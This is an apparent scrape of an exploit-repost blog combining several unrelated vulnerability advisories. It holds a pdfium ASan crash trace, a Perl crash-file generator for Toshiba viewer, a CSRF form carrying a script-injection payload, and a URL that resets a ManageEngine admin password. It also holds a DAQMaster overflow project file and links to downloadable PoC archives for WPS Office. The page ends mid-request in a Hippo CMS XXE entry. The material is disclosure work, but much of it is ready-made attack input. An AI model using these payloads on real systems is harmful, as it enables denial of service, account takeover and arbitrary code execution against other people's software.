Source: https://code.google.com/p/google-security-research/issues/detail?id=613
The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing:
--- cut ---
$ ./pdfium_test asan_heap-uaf_9d42b5_2729_a5aed985095e827c725b94e7b6a4d4ed
Rendering PDF file asan_heap-uaf_9d42b5_2729_a5aed985095e827c725b94e7b6a4d4ed.
Non-linearized path...
=================================================================
==22386==ERROR: AddressSanitizer: heap-use-after-free on address 0x606000001160 at pc 0x000000b604dc bp 0x7ffd824f3c70 sp 0x7ffd824f3c68
READ of size 8 at 0x606000001160 thread T0
#0 0xb604db in opj_t2_read_packet_header third_party/libopenjpeg20/t2.c:874:54
#1 0xb5edd9 in opj_t2_decode_packet third_party/libopenjpeg20/t2.c:536:15
#2 0xb5e06c in opj_t2_decode_packets third_party/libopenjpeg20/t2.c:422:39
#3 0xb1b309 in opj_tcd_t2_decode third_party/libopenjpeg20/tcd.c:1555:15
#4 0xb1adc1 in opj_tcd_decode_tile third_party/libopenjpeg20/tcd.c:1294:15
#5 0xa5ef5f in opj_j2k_decode_tile third_party/libopenjpeg20/j2k.c:8065:15
#6 0xa9d214 in opj_j2k_decode_tiles third_party/libopenjpeg20/j2k.c:9596:23
#7 0xa51e2c in opj_j2k_exec third_party/libopenjpeg20/j2k.c:7286:41
#8 0xa6b690 in opj_j2k_decode third_party/libopenjpeg20/j2k.c:9796:15
#9 0xaba6ed in opj_jp2_decode third_party/libopenjpeg20/jp2.c:1483:8
#10 0xa39d8d in opj_decode third_party/libopenjpeg20/openjpeg.c:412:10
#11 0x786a19 in CJPX_Decoder::Init(unsigned char const*, unsigned int) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:742:11
#12 0x78b63c in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10
#13 0xec1c9b in CPDF_DIBSource::LoadJpxBitmap() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:689:24
#14 0xeb8296 in CPDF_DIBSource::CreateDecoder() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5
#15 0xeb0cf9 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13
#16 0xe8a295 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7
#17 0xe89a99 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13
#18 0xed4f7e in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11
#19 0xed6aaf in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17
#20 0xe96f16 in CPDF_ImageRenderer::StartLoadDIBSource() core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7
#21 0xe8db49 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7
#22 0xe67c11 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10
#23 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
#24 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
#25 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3
#26 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3
#27 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3
#28 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
#29 0x4f16e9 in main samples/pdfium_test.cc:608:5
0x606000001160 is located 0 bytes inside of 49-byte region [0x606000001160,0x606000001191)
freed by thread T0 here:
#0 0x4beb80 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61
#1 0xa5bba5 in opj_j2k_read_sod third_party/libopenjpeg20/j2k.c:4359:61
#2 0xa5784a in opj_j2k_read_tile_header third_party/libopenjpeg20/j2k.c:7932:31
#3 0xa9cc56 in opj_j2k_decode_tiles third_party/libopenjpeg20/j2k.c:9568:23
#4 0xa51e2c in opj_j2k_exec third_party/libopenjpeg20/j2k.c:7286:41
#5 0xa6b690 in opj_j2k_decode third_party/libopenjpeg20/j2k.c:9796:15
#6 0xaba6ed in opj_jp2_decode third_party/libopenjpeg20/jp2.c:1483:8
#7 0xa39d8d in opj_decode third_party/libopenjpeg20/openjpeg.c:412:10
#8 0x786a19 in CJPX_Decoder::Init(unsigned char const*, unsigned int) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:742:11
#9 0x78b63c in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10
#10 0xec1c9b in CPDF_DIBSource::LoadJpxBitmap() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:689:24
#11 0xeb8296 in CPDF_DIBSource::CreateDecoder() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5
#12 0xeb0cf9 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13
#13 0xe8a295 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7
#14 0xe89a99 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13
#15 0xed4f7e in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11
#16 0xed6aaf in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17
#17 0xe96f16 in CPDF_ImageRenderer::StartLoadDIBSource() core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7
#18 0xe8db49 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7
#19 0xe67c11 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10
#20 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
#21 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
#22 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3
#23 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3
#24 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3
#25 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
#26 0x4f16e9 in main samples/pdfium_test.cc:608:5
#27 0x7f3425bc7ec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
previously allocated by thread T0 here:
#0 0x4beb80 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61
#1 0xa5bba5 in opj_j2k_read_sod third_party/libopenjpeg20/j2k.c:4359:61
#2 0xa5784a in opj_j2k_read_tile_header third_party/libopenjpeg20/j2k.c:7932:31
#3 0xa9cc56 in opj_j2k_decode_tiles third_party/libopenjpeg20/j2k.c:9568:23
#4 0xa51e2c in opj_j2k_exec third_party/libopenjpeg20/j2k.c:7286:41
#5 0xa6b690 in opj_j2k_decode third_party/libopenjpeg20/j2k.c:9796:15
#6 0xaba6ed in opj_jp2_decode third_party/libopenjpeg20/jp2.c:1483:8
#7 0xa39d8d in opj_decode third_party/libopenjpeg20/openjpeg.c:412:10
#8 0x786a19 in CJPX_Decoder::Init(unsigned char const*, unsigned int) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:742:11
#9 0x78b63c in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10
#10 0xec1c9b in CPDF_DIBSource::LoadJpxBitmap() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:689:24
#11 0xeb8296 in CPDF_DIBSource::CreateDecoder() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5
#12 0xeb0cf9 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13
#13 0xe8a295 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7
#14 0xe89a99 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13
#15 0xed4f7e in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11
#16 0xed6aaf in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17
#17 0xe96f16 in CPDF_ImageRenderer::StartLoadDIBSource() core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7
#18 0xe8db49 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7
#19 0xe67c11 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10
#20 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
#21 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
#22 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3
#23 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3
#24 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3
#25 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
#26 0x4f16e9 in main samples/pdfium_test.cc:608:5
#27 0x7f3425bc7ec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
SUMMARY: AddressSanitizer: heap-use-after-free third_party/libopenjpeg20/t2.c:874:54 in opj_t2_read_packet_header
Shadow bytes around the buggy address:
0x0c0c7fff81d0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 fa
0x0c0c7fff81e0: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa
0x0c0c7fff81f0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00
0x0c0c7fff8200: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 fa
0x0c0c7fff8210: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
=>0x0c0c7fff8220: 00 00 00 00 00 00 00 fa fa fa fa fa[fd]fd fd fd
0x0c0c7fff8230: fd fd fd fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c0c7fff8240: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
0x0c0c7fff8250: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
0x0c0c7fff8260: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00
0x0c0c7fff8270: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==22386==ABORTING
--- cut ---
The crash was reported at https://code.google.com/p/chromium/issues/detail?id=551470. Attached is the PDF file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39401.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863594878
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#!/usr/bin/perl
# Exploit Title: Toshiba viewer v2 p3console Local Denial of Service
# Date: 02-02-2016
# Author: JaMbA
# Download: http://business.toshiba.com/downloads/KB/f1Ulds/9942/viewer2-cj242-v106.zip
# Version: 2
# Tested on: Windows 7
my $file= "Crash.fax";
my $junk= "\x41" x 2048;
open($FILE,">$file");
print $FILE $junk;
print "\nCrash.fax File Created successfully\n";
print "\ Oumaima & Tarta (Ahmadso best friend)\n";
close($FILE);
=========================================================================================
Cross-Site Request Forgery Vulnerability in ManageEngine Network Configuration Management
=========================================================================================
.. contents:: Table Of Content
Overview
========
Title:- Cross-Site Request Forgery (CSRF) Vulnerability in ManageEngine Network Configuration Management
Author: Kaustubh G. Padwad
Vendor: ZOHO Corp
Product: ManageEngine Network Configuration Manager
Tested Version: : Network Configuration Manager Build 11000
Severity: HIGH
Advisory ID
============
2016-02-Manage_Engine
About the Product:
==================
Network Configuration Manager is a web–based, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, Network Configuration Manager helps automate and take total control of the entire life cycle of device configuration management.
Description:
============
This Cross-Site Request Forgery vulnerability enables an anonymous attacker to add an device into the application. and device fileds are vulnerable tocross site scripting attack This leads to compromising the whole domain as the application.
Vulnerability Class:
====================
Cross-Site Request Forgery (CSRF) - https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
How to Reproduce: (POC):
========================
* Add follwing code to webserver and send that malicious link to application Admin.
* No Login Required as this is on logon Page
( Soical enginering might help here
* For Example :- Device password has been changed click here to reset
CSRF COde
=========
<html>
<body>
<form action="http://192.168.1.10:8080/netflow/jspui/j_security_check">
<input type="hidden" name="radiusUserEnabled" value="false" />
<input type="hidden" name="AUTHRULE_NAME" value="Authenticator" />
<input type="hidden" name="j_username" value="admin52f43'><script>alert(1)</script>6f472a19875" />
<input type="hidden" name="j_password" value="admin" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Mitigation
==========
1. Download the security.xml from here https://drive.google.com/file/d/0B6Vlr2bSsrysR3N1cE82NUNJV28/view?usp=sharing
2. Stop the NCM service.
3. Replace the attached security.xml under NCM_Home/webapps/netflow/WEB-INF.
4. Start the NCM service and test for the Vulnerability
Disclosure:
===========
28-JAN-2016 Repoerted to vendor
29-JAN-2016 Fixed By Vendor
#credits:
Kaustubh Padwad
Information Security Researcher
kingkaustubh@me.com
https://twitter.com/s3curityb3ast
http://breakthesec.com
https://www.linkedin.com/in/kaustubhpadwad
#####################################################################################
Application: WPS Office
Platforms: Windows
Versions: Version 2016
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
WPS Office (an acronym for Writer, Presentation and Spreadsheets,[2] previously known as Kingsoft Office) is an office
suite for Microsoft Windows, Linux,[1] iOS[3] and Android OS,[4] developed by Zhuhai-basedChinese software developer Kingsoft.
WPS Office is a suite of software which is made up of three primary components: WPS Writer, WPS Presentation, and WPS Spreadsheet.
The personal basic version is free to use, but a watermark is printed on all printed output after the 30 day trial ends.
(https://en.wikipedia.org/wiki/WPS_Office)
#####################################################################################
============================
2) Report Timeline
============================
2015-12-31: Francis Provencher from COSIG report the issue to WPS;
2016-01-04: WPS security confirm this issue;
2016-01-14: COSIG ask an update status;
2016-01-21: COSIG ask an update status;
2016-02-01: COSIG release this advisory;
#####################################################################################
============================
3) Technical details
============================
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of WPS.
User interaction is required to exploit this vulnerability in that the target must open a malicious file.
By providing a malformed .xls file, an attacker can cause an heap memory corruption.
An attacker could leverage this to execute arbitrary code under the context of the WPS Spreadsheet process.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2016-07.xlsx
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39398.zip
###############################################################################
#####################################################################################
Application: WPS Office
Platforms: Windows
Versions: Version 2016
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
WPS Office (an acronym for Writer, Presentation and Spreadsheets,[2] previously known as Kingsoft Office) is an office
suite for Microsoft Windows, Linux,[1] iOS[3] and Android OS,[4] developed by Zhuhai-basedChinese software developer Kingsoft.
WPS Office is a suite of software which is made up of three primary components: WPS Writer, WPS Presentation, and WPS Spreadsheet.
The personal basic version is free to use, but a watermark is printed on all printed output after the 30 day trial ends.
(https://en.wikipedia.org/wiki/WPS_Office)
#####################################################################################
============================
2) Report Timeline
============================
2015-12-31: Francis Provencher from COSIG report the issue to WPS;
2016-01-04: WPS security confirm this issue;
2016-01-14: COSIG ask an update status;
2016-01-21: COSIG ask an update status;
2016-02-01: COSIG release this advisory;
#####################################################################################
============================
3) Technical details
============================
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of WPS.
User interaction is required to exploit this vulnerability in that the target must open a malicious file.
The specific flaw exists within the handling of a crafted Presentation files with an invalid “Length” header in a drawingContainer.
By providing a malformed .ppt file, an attacker can cause an memory corruption by dereferencing an uninitialized pointer.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2016-06.ppt
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39397.zip
###############################################################################
#####################################################################################
Application: WPS Office
Platforms: Windows
Versions: Version before 2016
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
WPS Office (an acronym for Writer, Presentation and Spreadsheets,[2] previously known as Kingsoft Office) is an office
suite for Microsoft Windows, Linux,[1] iOS[3] and Android OS,[4] developed by Zhuhai-basedChinese software developer Kingsoft.
WPS Office is a suite of software which is made up of three primary components: WPS Writer, WPS Presentation, and WPS Spreadsheet.
The personal basic version is free to use, but a watermark is printed on all printed output after the 30 day trial ends.
(https://en.wikipedia.org/wiki/WPS_Office)
#####################################################################################
============================
2) Report Timeline
============================
2015-11-24: Francis Provencher from COSIG report the issue to WPS;
2015-12-06: WPS security confirm this issue;
2016-01-01: COSIG ask an update status;
2016-01-07: COSIG ask an update status;
2016-01-14: COSIG ask an update status;
2016-01-21: COSIG ask an update status;
2016-02-01: COSIG release this advisory;
#####################################################################################
============================
3) Technical details
============================
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of WPS.
User interaction is required to exploit this vulnerability, the target must open a malicious file.
The specific flaw exists within the handling of a crafted DOC files with an invalid value into the “OneTableDocumentStream”
data section causing a stackbase memory corruption.
###############################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2016-05.doc
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39396.zip
###############################################################################
#####################################################################################
Application: WPS Office
Platforms: Windows
Versions: Version before 2016
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
WPS Office (an acronym for Writer, Presentation and Spreadsheets,[2] previously known as Kingsoft Office) is an office
suite for Microsoft Windows, Linux,[1] iOS[3] and Android OS,[4] developed by Zhuhai-basedChinese software developer Kingsoft.
WPS Office is a suite of software which is made up of three primary components: WPS Writer, WPS Presentation, and WPS Spreadsheet.
The personal basic version is free to use, but a watermark is printed on all printed output after the 30 day trial ends.
(https://en.wikipedia.org/wiki/WPS_Office)
#####################################################################################
============================
2) Report Timeline
============================
2015-11-24: Francis Provencher from COSIG report the issue to WPS;
2015-12-06: WPS security confirm this issue;
2016-01-01: COSIG ask an update status;
2016-01-07: COSIG ask an update status;
2016-01-14: COSIG ask an update status;
2016-01-21: COSIG ask an update status;
2016-02-01: COSIG release this advisory;
#####################################################################################
============================
3) Technical details
============================
The specific flaw exists within the handling of a crafted PPT files with an invalid value into “texttype” in the “clientTextBox”
into a “DrawingContainer”. An heap memory corruption occured and could allow remote attackers to execute arbitrary code
on vulnerable installations of WPS. User interaction is required to exploit this vulnerability, the target must open a malicious file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2016-04.ppt
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39395.zip
###############################################################################
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
# Exploit Title: ManageEngine Eventlog Analyzer Privilege Escalation
# Exploit Author: @GraphX
# Vendor Homepage:http://www.manageengine.com
# Version: 4.0 - 10
1. Description:
The manageengine eventlog analyzer fails to properly verify user
privileges when making changes via the userManagementForm.do. An
unprivileged user would be allowed to make changes to any account by
changing the USER_ID field to a number corresponding to another user.
Testing discovered that the default admin and guest accounts are 1 and 2.
Considering the recent similar vulnerabilities discovered in a more
current version of a similar product by ManageEngine, it is possible that
more versions of the software including current, are vulnerable. According
to the vendor this is fixed in version 10.8.
2. Proof of Concept
-login as an unprivileged user
-Use the following URL to change the admin password to "admin"
http://<IP_ADDRESS>/event/userManagementForm.do?addField=false&action=request.getParameter(&password=admin&email=&USER_ID=1&Submit=Save+User+Details&userName=admin
3. Solution:
Upgrade to 10.8
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAEBCgAGBQJWr4qsAAoJEGoTpzhfiAPxDvwQAKjV4QxOQXnC+LReaCtBBx/7
aZ8YVTrVZbWlvWoQsvksYmF5HRgQsD91pSYhbQ2IkPVGiDnl8MwTek8fnv7p62Ep
7ZL3sv+QB2IRi73TW3uE32rD5LBikv9qrVQfnr8uI8xM+HRjX347gABYVp7TAyFq
nq6oWT9ngdEgBMDb0x4tlCRSvodaWygeD+xOy3Pb/HlpZBMnwrvKwiRxSbvDKQw9
kM3P3uVcRIVFLaFaEMJUrWc/iliCLPaKbd9IDXoVp4tBoFj6uMNSdR8VeIDWQg5A
+RQH0oAsx1wqJOY02BpDXkMAEAIeXH1TEFz5vOvpTubLxC34aFHabLCMWjdCc0aK
+lE9HZLfzwRADo5KtdQAmiLjlllNsOuf58MUjtdGr+ODqyDjoJOoZcqm5RUfe0M4
EGpT0+6Xo6pWJMfM6fOnZT9OZd8hLac30Dz4GQTjFncSpVsMs9ED6NMHh4+nQiAk
r991kL4SyjF7YDV+rG86fvbWOfNpWrHZb/yLwAvAp7OtZBkDFmwoTPVtVSJHJ9N2
zQR4ufM0UnqVa3zKMzplngVnASStmg9HY4hxH8sUm7NYMq2ULimz1xTvg2jYoxWZ
Fp9JsEdiT/vdCWhqBthR4B3rVc/EtDasDHdzGHvp60HihAaF9GBG7RmgHUc13lp9
UAk1W7ydKCcFdw1HHFfL
=RJuV
-----END PGP SIGNATURE-----
Autonics DAQMaster 1.7.3 DQP Parsing Buffer Overflow Code Execution
Vendor: Autonics Corporation
Product web page: https://www.autonics.com
Affected version: 1.7.3 (build 2454)
1.7.0 (build 2333)
1.5.0 (build 2117)
Summary: DAQMaster is comprehensive device management program
that can be used with Autonics thermometers, panel meters,
pulse meters, and counters, etc and with Konics recorders,
indicators. DAQMaster provides GUI control for easy and convenient
management of parameters and multiple device data monitoring.
Desc: The vulnerability is caused due to a boundary error in the
processing of a project file, which can be exploited to cause a
buffer overflow when a user opens e.g. a specially crafted .DQP
project file with a large array of bytes inserted in the 'Description'
element. Successful exploitation could allow execution of arbitrary
code on the affected machine.
---------------------------------------------------------------------
(ee8.1ee8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=57010748 ecx=02bb9a00 edx=00808080 esi=00000001 edi=00000001
eip=00405d45 esp=0018f59c ebp=0018f91c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
DAQMaster!TClsValueListShowData$qqrp16GraphicsTBitmapip10TPropValuei+0x41d:
00405d45 8b10 mov edx,dword ptr [eax] ds:002b:41414141=????????
---------------------------------------------------------------------
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5302
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5302.php
20.11.2015
--
thricer.dqp project PoC:
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39393.zip
------------------------
<DAQMaster xmlns="http://www.w3.org/2001/XMLSchema-instance">
<Project>
<General>
<Name>Noname</Name>
<Company></Company>
<Worker></Worker>
<Description>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...[n]</Description>
<DataFolder>C:\Users\zslab\Documents</DataFolder>
<DeskLayout>0</DeskLayout>
<NameRule></NameRule>
<FileType>0</FileType>
<RunMode>0</RunMode>
<Schedule Active="0"/>
<Layout>0</Layout>
</General>
<System/>
<UserTag/>
<DDEServer/>
<WorkSpace WorkSpaceNum="1">
<WorkSpace>DAQ WorkSpace</WorkSpace>
</WorkSpace>
<UIList/>
<Layout/>
</Project>
</DAQMaster>
Hippo CMS 10.1 XML External Entity Information Disclosure Vulnerability
Vendor: Hippo B.V.
Product web page: http://www.onehippo.org
Affected version: 10.1, 7.9 and 7.8 (Enterprise Edition)
Summary: Hippo CMS is an open source Java CMS. We built it so you
can easily integrate it into your existing architecture.
Desc: XXE (XML External Entity) processing through upload of SVG
images in the CMS, and through XML import in the CMS Console application.
Tested on: Linux 2.6.32-5-xen-amd64
Java/1.8.0_66
Apache-Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5301
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5301.php
Vendor: http://www.onehippo.org/security-issues-list/security-12.html
http://www.onehippo.org/about/release-notes/10/10.1.2-release-notes.html
04.12.2015
---
[Request]:
POST /?1-8.IBehaviorListener.0-root-tabs-panel~container-cards-2-panel-center-tabs-panel~container-cards-3-panel-editor-extension.editor-form-template-view-3-item-view-1-item-extension.upload-fileUpload-form-fileUpload HTTP/1.1
Host: 10.0.2.17
User-Agent: ZSL_Web_Scanner/2.8
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
